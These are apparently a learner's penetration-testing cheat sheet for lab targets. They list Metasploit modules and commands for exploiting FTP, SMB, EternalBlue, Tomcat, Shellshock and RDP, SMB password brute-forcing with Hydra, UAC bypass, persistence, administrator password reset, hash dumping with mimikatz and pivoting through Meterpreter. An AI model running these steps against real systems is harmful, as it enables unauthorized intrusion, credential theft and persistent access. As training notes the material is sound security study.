• find / -name local.txt 2> /dev/null
• find -type d -name ".*" 2>/dev/null it will check hidden directories.

Password Cracking

Nmap

Linux and Windows

Linux exploit

21 FTP server vsftpd2.3.4

• ftp <ip>
  • search vsftpd
  • ftp

22 ssh server

• ssh root@10.0.1.22
• nc 10.0.1.22 22 To Fetch the banner
  • search libssh_auth_bypass
  • SSH

25, 465, 587 SMTP Haraka smtpd

• search type:exploit name:haraka
• SMTP

445, 139 (SMB uses 445 however originally SMB ran on top of NetBIOS using 139)

• search type:exploit name:samba
• SMB windows
• enum4linux -a <ip> Save the user in user.txt For brute force attack
• enum4linux -a -u admin -p password1
• hydra -L user.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <ip> smb
• You can use psexec module in metasploit
• crackmapexec smb target2.ine.local -u administrator -p pineapple --shares
• smbclient //target2.ine.local/C$ -U administrator
• smbclient //<ip>/josh -U josh If you Know pass
• smbclient //<ip>/pubfiles -N directories are present inside share "pubfiles"
• smbclient //127.0.0.1/shawn -U admin
  • it will connect the server like a ftp
  • shawn is a user
  • -U admin authenticate as a admin mean you can login using admin logs smbmap -H 127.0.0.1 -u admin -p password1
  • It will display the user's and permissions
• smbclient -L 127.0.0.1 -N server description
• rpcclient -U "" -N 127.0.0.1 List all users that exists on the samba server

Windows exploit

• Full automatice enumaration for windows JAWS

  • you should have access to the target system

  • copy the code from the jaws-enum.ps1 fiel And the save the file as jaws-enum.ps1
  • upload the file in target system using meterpreter upload /root/jaws-enum.psq
  • powershell.exe -ExecutionPloicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
  • when your done with execution the output will save in the JAWS-Enum.txt

162 Simple Network Management Protocol (SNMP)

• search type:exploit psexec
• SNMP

445 Windows MS17-010 SMB Vulnerability(Eternal Blue)

• search eternalblue
• Eternal Blue

5985 or 5986 (winRM vuln) ---> http Microsoft HTTPAPI httpd 2.0 SSDP/UPnp

• search type:auxiliary winrm
• WinRM

8080 Apache Tomcat

• search type:exploit tomcat
• Tomcat

3389 RDP service

• xfreerdp /u:administrator /p:password123 /v:<targetip>

  • search rdp platform:windows
  • use post/windows/manage/enable_rdp
  • RDP_enable
  • For more information
  • RDP2
  • RDP3

Windows privilege escalation win

• 1.Bypassing UAC with UACMe (User Account control)
  • UAC

Windows post exploit

• search migrate

use post/windows/manage/migrate
exploit

post exploit in windows

finding the current user logged in

use post/windows/gather/enum_logged_on_users and exploit it

Establishing Persistence On Windows

• search platform:windows persistence

• Persistence Connection

• To check the permission of a user

  • search win_privs

use exploit/windows/winrm/winrm_script_exec

1

• search win_privs

set the session uid and exploit it

2

• search enum_logged_on

set the session uid and exploit it __here you get the SID of current logged in user

3

check target system is a vm or not

• search checkvm
• use post/windows/gather/checkvm

set the session uid and exploit it

4 program install on target system

• search enum_applications
• use post/windows/gather/enum_applications

• set the session id

5 detect antivirus installed in target system

• search type:post platform:windows enum_av
• use post/windows/gather/enum_av_excluded

• set the session id

6 check the targret system which part of the domain

• search enum_computer
• use post/windows/gather/enum_computers

7 chech for the installed patches

• search enum_patches
• use post/windows/gather/enum_patches

• set the session id

• __if you are facing the error then migrate to someother process useing ps

8 Checking for the any shares in the target system

• search enum_shares
• use post/windows/gather/enum_shares

• set the session id

9 Checking or Enabling RDP service

• xfreerdp /u:administrator /p:password123 /v:<targetip>

  • search rdp platform:windows
  • use post/windows/manage/enable_rdp

• now you can change the password for the user in my case i have access to the administrator account

• so i have meterpreter session running in the background

• so use shell

• change the password

• net user administrator password123

  • you have change the password of the admininstrator so that we can login using xfreerdp into rdp using this login
  • RDP_enable
  • For more information
  • RDP2
  • RDP3

Dumping hashes with mimikatz

• Mimikatz

Linux post exploit

use post/linux/gather/hashdump
set session 1
exploit

• use loot

Web

/gettime.cgi Bash CVE-2014-6271 Vulnerability (Shellshock)

• use exploit/multi/http/apache_mod_cgi_bash_env_exec
  • set TARGETURI /gettime.cig
• Shellshock

Apache Tomcat 8080

• search type:exploit tomcat
• tomcat

80 XODA running

• search xoda
• xoda

80 http HttpFileServer httpd 2.3 for windows server

• search rejetoo

80 BadBlue httpd 2.7 (mimikatz)

• search badblue 2.7
• use exploit/windows/http/badblue_passthru
• Mimikatz

Windows commands

• current logged on user

  • query user
  • it is a windows command
  • or you can use net users
  • net user <user_name> for more information on that user
  • use post/windows/gather/enu_logged_on_users
  • net localgroup
  • net localgroup administrator

• To know the current privilages

  • whoami /priv

• route print

• Display the all devices connected to the network

  • arp -a

• Display open port on target system

  • netstat -ano

• Display the state of the firewall

  • netsh firewall show state
  • or nesth advfirewall firewall help it will open help
    • netsh advfirewall firewall dump
    • netsh advfirewall show allprofiles

• service running

• tasklist /SVC

• schedule task display

  • schtasks /query /fo LIST /v

linux

hostname
cat /etc/issue
cat /etc/*release
uname -a 
uname -r 
env
lscpu 
free -h 
df -h 
df -ht ext4
lsblk | grep sd 
dpkg -l 
adduser -m royal /bin/bash
groups
groups bob
usermod -aG root bob
lastlog

pivoting

• Adding target 1 route to your system in meterpreter

  • Note: you must have access to the target 1 in meterpreter

  • run autoroute -s <target_ip_1>.0/20
  • run autoroute -p checking that routing is added

  • keep the meterpreter session background so that we can do port scan

  • search portscan use tcp scan use auxiliary/scanner/portscn/tcp
    • set RHOSTS <target_ip_2> & set PORTS 1-100
    • If you want to know, what service version is running on that port in target 2 you need to do port forward, because we need nmap, Metasploit can't do it
    • portfwd add -l 1234 -p 80 -r <target_ip_2>
      • -l 1234 your setting a specific port for port forward you can set any port which is not used by any service
      • -p 80 the actually port which is running in the target 2 that you want to scan more

      • Note this port forward should done in meterpreter session

    • After adding the port forward in meterpreter then open a new terminal to perform nmap scan on port 1234
    • nmap -sV -O -T4 -p 1234 localhost
      • for example you will get badblue service is running on port 80
      • go back to the meterpreter and search search BadBlue
      • use exploit/windows/http/badblue_passthru
        • set payload windows/meterpreter/bind_tcp
        • set RHOSTS <target_ip_2>
        • exploit
        • sysinfo getuid